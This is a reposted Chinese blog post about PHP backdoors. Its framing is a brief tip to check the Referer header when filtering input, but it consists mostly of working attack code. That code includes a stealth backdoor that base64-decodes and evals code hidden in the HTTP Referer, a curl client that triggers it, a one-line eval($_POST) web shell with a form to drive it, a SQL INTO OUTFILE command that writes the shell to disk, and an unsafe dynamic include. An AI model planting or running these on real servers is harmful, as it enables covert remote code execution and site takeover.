[转]关于PHP后门

[转]关于PHP后门

http://www.oschina.net/code/snippet_164175_21174?p=1#comments

当过滤  POST  GET   COOKIE 时 , 注意 $_SERVER [ 'HTTP_REFERER' ]
1.php  上传后门代码
《?php
//1.php
header( 'Content-type:text/html;charset=utf-8' );
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a );
if (reset( $a ) == '10' && count ( $a ) == 9) {
    eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6)))));
}



2.php 本地
《?php
//2.php
header( 'Content-type:text/html;charset=utf-8' );
//要执行的代码
$code = <<
phpinfo();
CODE;
//进行base64编码
$code = base64_encode ( $code );
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ;
//后门url
$url = 'http://localhost/test1/1.php' ;
$ch = curl_init();
$options = array (
     CURLOPT_URL => $url ,
     CURLOPT_HEADER => FALSE,
     CURLOPT_RETURNTRANSFER => TRUE,
     CURLOPT_REFERER => $referer
);
curl_setopt_array( $ch , $options );
echo curl_exec( $ch );


------------------
注意CURL


-------------------------
《?php @eval_r($_POST['c']);?》



《html>  
《body>  
《form action="a.php" method="post">  
《input type="text" name="c" value="phpinfo();">  
《input type="submit" value="submit">  
《/form>  
《/body>  
《/html>  

-------------------


select '《?php @eval_r($_POST["c"]);?》' INTO OUTFILE 'e:/m.php'  


--------------
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
posted @ 2016-04-18 17:34 Newman·Li 阅读( ...) 评论( ...) 编辑 收藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值